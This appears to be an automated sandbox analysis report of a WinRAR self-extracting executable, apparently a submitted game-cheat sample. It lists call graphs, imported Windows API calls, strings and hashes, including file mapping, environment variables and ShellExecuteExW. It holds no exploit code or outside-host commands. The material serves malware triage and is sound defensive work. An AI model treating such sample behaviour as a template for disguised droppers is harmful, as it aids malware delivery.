API calls std::bad_exception::bad_exception 25391 d1bee0 GetCommandLineA GetCommandLineW 24739 d0eae7 24740 d0eaf1 24739->24740 24741 d0e85d ___delayLoadHelper2@8 14 API calls 24740->24741 24742 d0eafe 24741->24742 25392 d0f4e7 29 API calls _abort 25394 cf5ef0 82 API calls 25443 cf95f0 80 API calls 25445 d09580 6 API calls 25396 d0c793 102 API calls 4 library calls 25398 d0c793 97 API calls 4 library calls 25449 d0b18d 78 API calls 25450 d0b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 24923 d0f3b2 24924 d0f3be ___scrt_is_nonwritable_in_current_image 24923->24924 24955 d0eed7 24924->24955 24926 d0f3c5 24927 d0f518 24926->24927 24930 d0f3ef 24926->24930 25028 d0f838 4 API calls 2 library calls 24927->25028 24929 d0f51f 25021 d17f58 24929->25021 24942 d0f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 24930->24942 24966 d18aed 24930->24966 24937 d0f40e 24939 d0f48f 24974 d0f953 GetStartupInfoW __cftof 24939->24974 24941 d0f495 24975 d18a3e 51 API calls 24941->24975 24942->24939 25024 d17af4 38 API calls _abort 24942->25024 24945 d0f49d 24976 d0df1e 24945->24976 24949 d0f4b1 24949->24929 24950 d0f4b5 24949->24950 24951 d0f4be 24950->24951 25026 d17efb 28 API calls _abort 24950->25026 25027 d0f048 12 API calls ___scrt_uninitialize_crt 24951->25027 24954 d0f4c6 24954->24937 24956 d0eee0 24955->24956 25030 d0f654 IsProcessorFeaturePresent 24956->25030 24958 d0eeec 25031 d12a5e 24958->25031 24960 d0eef1 24961 d0eef5 24960->24961 25039 d18977 24960->25039 24961->24926 24964 d0ef0c 24964->24926 24967 d18b04 24966->24967 24968 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24967->24968 24969 d0f408 24968->24969 24969->24937 24970 d18a91 24969->24970 24971 d18ac0 24970->24971 24972 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 24971->24972 24973 d18ae9 24972->24973 24973->24942 24974->24941 24975->24945 25090 d00863 24976->25090 24980 d0df3d 25139 d0ac16 24980->25139 24982 d0df46 __cftof 
24983 d0df59 GetCommandLineW 24982->24983 24984 d0dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 24983->24984 24985 d0df68 24983->24985 24986 cf4092 _swprintf 51 API calls 24984->24986 25143 d0c5c4 24985->25143 24988 d0e04d SetEnvironmentVariableW GetModuleHandleW LoadIconW 24986->24988 25154 d0b6dd LoadBitmapW 24988->25154 24991 d0dfe0 25148 d0dbde 24991->25148 24992 d0df76 OpenFileMappingW 24995 d0dfd6 CloseHandle 24992->24995 24996 d0df8f MapViewOfFile 24992->24996 24995->24984 24997 d0dfa0 __InternalCxxFrameHandler 24996->24997 24998 d0dfcd UnmapViewOfFile 24996->24998 25003 d0dbde 2 API calls 24997->25003 24998->24995 25005 d0dfbc 25003->25005 25004 d090b7 8 API calls 25006 d0e0aa DialogBoxParamW 25004->25006 25005->24998 25007 d0e0e4 25006->25007 25008 d0e0f6 Sleep 25007->25008 25009 d0e0fd 25007->25009 25008->25009 25012 d0e10b 25009->25012 25184 d0ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 25009->25184 25011 d0e12a DeleteObject 25013 d0e146 25011->25013 25014 d0e13f DeleteObject 25011->25014 25012->25011 25015 d0e177 25013->25015 25017 d0e189 25013->25017 25014->25013 25185 d0dc3b 6 API calls 25015->25185 25181 d0ac7c 25017->25181 25019 d0e17d CloseHandle 25019->25017 25020 d0e1c3 25025 d0f993 GetModuleHandleW 25020->25025 25317 d17cd5 25021->25317 25024->24939 25025->24949 25026->24951 25027->24954 25028->24929 25030->24958 25043 d13b07 25031->25043 25035 d12a6f 25036 d12a7a 25035->25036 25057 d13b43 DeleteCriticalSection 25035->25057 25036->24960 25038 d12a67 25038->24960 25086 d1c05a 25039->25086 25042 d12a7d 7 API calls 2 library calls 25042->24961 25044 d13b10 25043->25044 25046 d13b39 25044->25046 25048 d12a63 25044->25048 25058 d13d46 25044->25058 25063 d13b43 DeleteCriticalSection 25046->25063 25048->25038 25049 d12b8c 25048->25049 25079 d13c57 25049->25079 25052 d12ba1 25052->25035 25054 d12baf 25055 d12bbc 25054->25055 25085 d12bbf 6 API calls ___vcrt_FlsFree 25054->25085 25055->25035 25057->25038 25064 d13c0d 
25058->25064 25061 d13d7e InitializeCriticalSectionAndSpinCount 25062 d13d69 25061->25062 25062->25044 25063->25048 25065 d13c4f 25064->25065 25066 d13c26 25064->25066 25065->25061 25065->25062 25066->25065 25071 d13b72 25066->25071 25069 d13c3b GetProcAddress 25069->25065 25070 d13c49 25069->25070 25070->25065 25076 d13b7e ___vcrt_InitializeCriticalSectionEx 25071->25076 25072 d13b95 LoadLibraryExW 25074 d13bb3 GetLastError 25072->25074 25075 d13bfa 25072->25075 25073 d13bf3 25073->25065 25073->25069 25074->25076 25075->25073 25077 d13c02 FreeLibrary 25075->25077 25076->25072 25076->25073 25078 d13bd5 LoadLibraryExW 25076->25078 25077->25073 25078->25075 25078->25076 25080 d13c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 25079->25080 25081 d13c71 25080->25081 25082 d13c8a TlsAlloc 25081->25082 25083 d12b96 25081->25083 25083->25052 25084 d13d08 6 API calls ___vcrt_InitializeCriticalSectionEx 25083->25084 25084->25054 25085->25052 25089 d1c073 25086->25089 25087 d0fbbc __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 25088 d0eefe 25087->25088 25088->24964 25088->25042 25089->25087 25091 d0ec50 25090->25091 25092 d0086d GetModuleHandleW 25091->25092 25093 d008e7 25092->25093 25094 d00888 GetProcAddress 25092->25094 25095 d00c14 GetModuleFileNameW 25093->25095 25195 d175fb 42 API calls 2 library calls 25093->25195 25096 d008a1 25094->25096 25097 d008b9 GetProcAddress 25094->25097 25106 d00c32 25095->25106 25096->25097 25099 d008cb 25097->25099 25099->25093 25100 d00b54 25100->25095 25101 d00b5f GetModuleFileNameW CreateFileW 25100->25101 25102 d00c08 CloseHandle 25101->25102 25103 d00b8f SetFilePointer 25101->25103 25102->25095 25103->25102 25104 d00b9d ReadFile 25103->25104 25104->25102 25108 d00bbb 25104->25108 25109 d00c94 GetFileAttributesW 25106->25109 25110 d00cac 25106->25110 25112 d00c5d CompareStringW 25106->25112 25186 cfb146 25106->25186 25189 d0081b 25106->25189 25108->25102 25111 d0081b 2 API calls 25108->25111 25109->25106 
25109->25110 25113 d00cb7 25110->25113 25116 d00cec 25110->25116 25111->25108 25112->25106 25115 d00cd0 GetFileAttributesW 25113->25115 25117 d00ce8 25113->25117 25114 d00dfb 25138 d0a64d GetCurrentDirectoryW 25114->25138 25115->25113 25115->25117 25116->25114 25118 cfb146 GetVersionExW 25116->25118 25117->25116 25119 d00d06 25118->25119 25120 d00d73 25119->25120 25121 d00d0d 25119->25121 25123 cf4092 _swprintf 51 API calls 25120->25123 25122 d0081b 2 API calls 25121->25122 25125 d00d17 25122->25125 25124 d00d9b AllocConsole 25123->25124 25126 d00df3 ExitProcess 25124->25126 25127 d00da8 GetCurrentProcessId AttachConsole 25124->25127 25128 d0081b 2 API calls 25125->25128 25196 d13e13 25127->25196 25130 d00d21 25128->25130 25132 cfe617 53 API calls 25130->25132 25131 d00dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 25131->25126 25133 d00d3c 25132->25133 25134 cf4092 _swprintf 51 API calls 25133->25134 25135 d00d4f 25134->25135 25136 cfe617 53 API calls 25135->25136 25137 d00d5e 25136->25137 25137->25126 25138->24980 25140 d0081b 2 API calls 25139->25140 25141 d0ac2a OleInitialize 25140->25141 25142 d0ac4d GdiplusStartup SHGetMalloc 25141->25142 25142->24982 25144 d0c5ce 25143->25144 25145 d0c6e4 25144->25145 25146 d01fac CharUpperW 25144->25146 25198 cff3fa 82 API calls 2 library calls 25144->25198 25145->24991 25145->24992 25146->25144 25149 d0ec50 25148->25149 25150 d0dbeb SetEnvironmentVariableW 25149->25150 25151 d0dc0e 25150->25151 25152 d0dc36 25151->25152 25153 d0dc2a SetEnvironmentVariableW 25151->25153 25152->24984 25153->25152 25155 d0b70b GetObjectW 25154->25155 25156 d0b6fe 25154->25156 25158 d0b71a 25155->25158 25199 d0a6c2 FindResourceW 25156->25199 25160 d0a5c6 4 API calls 25158->25160 25162 d0b72d 25160->25162 25161 d0b770 25173 cfda42 25161->25173 25162->25161 25163 d0b74c 25162->25163 25164 d0a6c2 13 API calls 25162->25164 25215 d0a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25163->25215 25166 d0b73d 25164->25166 25166->25163 25169 d0b743 
DeleteObject 25166->25169 25167 d0b754 25216 d0a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25167->25216 25169->25163 25170 d0b75d 25217 d0a80c 8 API calls 25170->25217 25172 d0b764 DeleteObject 25172->25161 25226 cfda67 25173->25226 25178 d090b7 25179 d0eb38 8 API calls 25178->25179 25180 d090d6 25179->25180 25180->25004 25182 d0acab GdiplusShutdown CoUninitialize 25181->25182 25182->25020 25184->25012 25185->25019 25187 cfb15a GetVersionExW 25186->25187 25188 cfb196 25186->25188 25187->25188 25188->25106 25190 d0ec50 25189->25190 25191 d00828 GetSystemDirectoryW 25190->25191 25192 d00840 25191->25192 25193 d0085e 25191->25193 25194 d00851 LoadLibraryW 25192->25194 25193->25106 25194->25193 25195->25100 25197 d13e1b 25196->25197 25197->25131 25197->25197 25198->25144 25200 d0a6e5 SizeofResource 25199->25200 25201 d0a7d3 25199->25201 25200->25201 25202 d0a6fc LoadResource 25200->25202 25201->25155 25201->25158 25202->25201 25203 d0a711 LockResource 25202->25203 25203->25201 25204 d0a722 GlobalAlloc 25203->25204 25204->25201 25205 d0a73d GlobalLock 25204->25205 25206 d0a7cc GlobalFree 25205->25206 25207 d0a74c __InternalCxxFrameHandler 25205->25207 25206->25201 25208 d0a754 CreateStreamOnHGlobal 25207->25208 25209 d0a7c5 GlobalUnlock 25208->25209 25210 d0a76c 25208->25210 25209->25206 25218 d0a626 GdipAlloc 25210->25218 25213 d0a7b0 25213->25209 25214 d0a79a GdipCreateHBITMAPFromBitmap 25214->25213 25215->25167 25216->25170 25217->25172 25219 d0a645 25218->25219 25220 d0a638 25218->25220 25219->25209 25219->25213 25219->25214 25222 d0a3b9 25220->25222 25223 d0a3e1 GdipCreateBitmapFromStream 25222->25223 25224 d0a3da GdipCreateBitmapFromStreamICM 25222->25224 25225 d0a3e6 25223->25225 25224->25225 25225->25219 25227 cfda75 __EH_prolog 25226->25227 25228 cfdaa4 GetModuleFileNameW 25227->25228 25229 cfdad5 25227->25229 25230 cfdabe 25228->25230 25272 cf98e0 25229->25272 25230->25229 25232 cfdb31 25283 d16310 25232->25283 25233 cf959a 80 API calls 25234 cfda4e 

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 00D00863: GetModuleHandleW.KERNEL32(kernel32), ref: 00D0087C
                                                      • Part of subcall function 00D00863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00D0088E
                                                      • Part of subcall function 00D00863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00D008BF
                                                      • Part of subcall function 00D0A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00D0A655
                                                      • Part of subcall function 00D0AC16: OleInitialize.OLE32(00000000), ref: 00D0AC2F
                                                      • Part of subcall function 00D0AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00D0AC66
                                                      • Part of subcall function 00D0AC16: SHGetMalloc.SHELL32(00D38438), ref: 00D0AC70
                                                    • GetCommandLineW.KERNEL32 ref: 00D0DF5C
                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00D0DF83
                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00D0DF94
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 00D0DFCE
                                                      • Part of subcall function 00D0DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00D0DBF4
                                                      • Part of subcall function 00D0DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00D0DC30
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D0DFD7
                                                    • GetModuleFileNameW.KERNEL32(00000000,00D4EC90,00000800), ref: 00D0DFF2
                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,00D4EC90), ref: 00D0DFFE
                                                    • GetLocalTime.KERNEL32(?), ref: 00D0E009
                                                    • _swprintf.LIBCMT ref: 00D0E048
                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00D0E05A
                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00D0E061
                                                    • LoadIconW.USER32(00000000,00000064), ref: 00D0E078
                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00D0E0C9
                                                    • Sleep.KERNEL32(?), ref: 00D0E0F7
                                                    • DeleteObject.GDI32 ref: 00D0E130
                                                    • DeleteObject.GDI32(?), ref: 00D0E140
                                                    • CloseHandle.KERNEL32 ref: 00D0E183
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                    • API String ID: 3049964643-433059772
                                                    • Opcode ID: 30a46cb1c9859a9d58334385c9e62782e76922ab652db89b62b082d1f925f810
                                                    • Instruction ID: 0b58b7b309f6c0bd9471b522c5fd14a704aad6c018da68e13e0f3e4bfec8670b
                                                    • Opcode Fuzzy Hash: 30a46cb1c9859a9d58334385c9e62782e76922ab652db89b62b082d1f925f810
                                                    • Instruction Fuzzy Hash: 2C61DF75904345AFD320AFA4EC89F2B7BADEB55704F04082AF949D23E1DB789948C772

                                                    Control-flow Graph

                                                    APIs
                                                    • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6D5
                                                    • SizeofResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A6EC
                                                    • LoadResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A703
                                                    • LockResource.KERNEL32(00000000,?,?,?,00D0B73D,00000066), ref: 00D0A712
                                                    • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,00D0B73D,00000066), ref: 00D0A72D
                                                    • GlobalLock.KERNEL32(00000000), ref: 00D0A73E
                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 00D0A762
                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00D0A7C6
                                                      • Part of subcall function 00D0A626: GdipAlloc.GDIPLUS(00000010), ref: 00D0A62C
                                                    • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00D0A7A7
                                                    • GlobalFree.KERNEL32(00000000), ref: 00D0A7CD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                    • String ID: PNG
                                                    • API String ID: 211097158-364855578
                                                    • Opcode ID: 4263274053acefcaa2d57f6850c06bcb2356367bda1de7d031438a679194a297
                                                    • Instruction ID: e155950fe44939d81a9d1094cf8ef1c07793dd7e61a3c8c2021a1c2b4575742f
                                                    • Opcode Fuzzy Hash: 4263274053acefcaa2d57f6850c06bcb2356367bda1de7d031438a679194a297
                                                    • Instruction Fuzzy Hash: 6E31C275600712BFC7219F25EC88E2BBBB9EF84761B054519F809C23A0EB31DC55CAB1

                                                    Control-flow Graph

                                                    APIs
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6C4
                                                      • Part of subcall function 00CFBB03: _wcslen.LIBCMT ref: 00CFBB27
                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6F2
                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA6FE
                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA728
                                                    • GetLastError.KERNEL32(?,?,?,?,00CFA592,000000FF,?,?), ref: 00CFA734
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                    • String ID:
                                                    • API String ID: 42610566-0
                                                    • Opcode ID: dcbe0dc810024494748f1a40342895f0588bc8a9f0bc39edf511ca11aee3362a
                                                    • Instruction ID: 96192b8cc95c8736822821ba7e3194e4bed6fa96fe98aea2052d7401c7477685
                                                    • Opcode Fuzzy Hash: dcbe0dc810024494748f1a40342895f0588bc8a9f0bc39edf511ca11aee3362a
                                                    • Instruction Fuzzy Hash: 4A418276900519ABCB25EF64CC88AE9F7B8FB48350F104196FA6DD3240D7346E94CFA1
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32(00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002,00000000), ref: 00D17E0F
                                                    • TerminateProcess.KERNEL32(00000000,?,00D17DC4,00000000,00D2C300,0000000C,00D17F1B,00000000,00000002,00000000), ref: 00D17E16
                                                    • ExitProcess.KERNEL32 ref: 00D17E28
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: Process$CurrentExitTerminate
                                                    • String ID:
                                                    • API String ID: 1703294689-0
                                                    • Opcode ID: 682075f74670d14e6eb4e19220f581c94ff85b252626275532e0388533f3a709
                                                    • Instruction ID: 5df271dc8e609e9bdf81732e76a9a52c26df1d87795e0ec20983c910ea81c7f0
                                                    • Opcode Fuzzy Hash: 682075f74670d14e6eb4e19220f581c94ff85b252626275532e0388533f3a709
                                                    • Instruction Fuzzy Hash: 9CE0BF31004244BBCF116F54ED0A9897FB9EB54751B044454F815CA232CF39DEA2CBB4
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D35000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D52000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265863189.0000000000D53000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cf0000_SAMP_CHEAT_ATVECHAU2.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 9da9d51393dea4a2a567081e6433d22149a28a36437eaff13e63da2bb4309cf1
                                                    • Instruction ID: f6a62e15935cb6b139a200dd0c0f60faed585e33827b5ecc5fb93af77dbf821a
                                                    • Opcode Fuzzy Hash: 9da9d51393dea4a2a567081e6433d22149a28a36437eaff13e63da2bb4309cf1
                                                    • Instruction Fuzzy Hash: 2A821C7190414DAFDF55DF64C891BFABB79AF05300F0841B9EA599B282CB315B8CCB62
                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00D0B7E5
                                                      • Part of subcall function 00CF1316: GetDlgItem.USER32(00000000,00003021), ref: 00CF135A
                                                      • Part of subcall function 00CF1316: SetWindowTextW.USER32(00000000,00D235F4), ref: 00CF1370
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0B8D1
                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D0B8EF
                                                    • IsDialogMessageW.USER32(?,?), ref: 00D0B902
                                                    • TranslateMessage.USER32(?), ref: 00D0B910
                                                    • DispatchMessageW.USER32(?), ref: 00D0B91A
                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00D0B93D
                                                    • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 00D0B960
                                                    • GetDlgItem.USER32(?,00000068), ref: 00D0B983
                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0B99E
                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0B9B1
                                                      • Part of subcall function 00D0D453: _wcslen.LIBCMT ref: 00D0D47D
                                                    • SetFocus.USER32(00000000), ref: 00D0B9B8
                                                    • _swprintf.LIBCMT ref: 00D0BA24
                                                      • Part of subcall function 00CF4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00CF40A5
                                                      • Part of subcall function 00D0D4D4: GetDlgItem.USER32(00000068,00D4FCB8), ref: 00D0D4E8
                                                      • Part of subcall function 00D0D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,00D0AF07,00000001,?,?,00D0B7B9,00D2506C,00D4FCB8,00D4FCB8,00001000,00000000,00000000), ref: 00D0D510
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00D0D51B
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D235F4), ref: 00D0D529
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D53F
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00D0D559
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D59D
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00D0D5AB
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00D0D5BA
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00D0D5E1
                                                      • Part of subcall function 00D0D4D4: SendMessageW.USER32(00000000,000000C2,00000000,00D243F4), ref: 00D0D5F0
                                                    • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 00D0BA68
                                                    • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 00D0BA90
                                                    • GetTickCount.KERNEL32 ref: 00D0BAAE
                                                    • _swprintf.LIBCMT ref: 00D0BAC2
                                                    • GetLastError.KERNEL32(?,00000011), ref: 00D0BAF4
                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 00D0BB43
                                                    • _swprintf.LIBCMT ref: 00D0BB7C
                                                    • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 00D0BBD0
                                                    • GetCommandLineW.KERNEL32 ref: 00D0BBEA
                                                    • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 00D0BC47
                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00D0BC6F
                                                    • Sleep.KERNEL32(00000064), ref: 00D0BCB9
                                                    • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 00D0BCE2
                                                    • CloseHandle.KERNEL32(00000000), ref: 00D0BCEB
                                                    • _swprintf.LIBCMT ref: 00D0BD1E
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0BD7D
                                                    • SetDlgItemTextW.USER32(?,00000065,00D235F4), ref: 00D0BD94
                                                    • GetDlgItem.USER32(?,00000065), ref: 00D0BD9D
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00D0BDAC
                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00D0BDBB
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0BE68
                                                    • _wcslen.LIBCMT ref: 00D0BEBE
                                                    • _swprintf.LIBCMT ref: 00D0BEE8
                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00D0BF32
                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00D0BF4C
                                                    • GetDlgItem.USER32(?,00000068), ref: 00D0BF55
                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00D0BF6B
                                                    • GetDlgItem.USER32(?,00000066), ref: 00D0BF85
                                                    • SetWindowTextW.USER32(00000000,00D3A472), ref: 00D0BFA7
                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00D0C007
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0C01A
                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00D0C0BD
                                                    • EnableWindow.USER32(00000000,00000000), ref: 00D0C197
                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00D0C1D9
                                                      • Part of subcall function 00D0C73F: __EH_prolog.LIBCMT ref: 00D0C744
                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00D0C1FD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1265778266.0000000000CF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CF0000, based on PE: true
                                                    • Associated: 00000000.00000002.1265766710.0000000000CF0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265807324.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1265822001.0000000000D2E000.00000004.00000001.01000000.00000003.sdmp
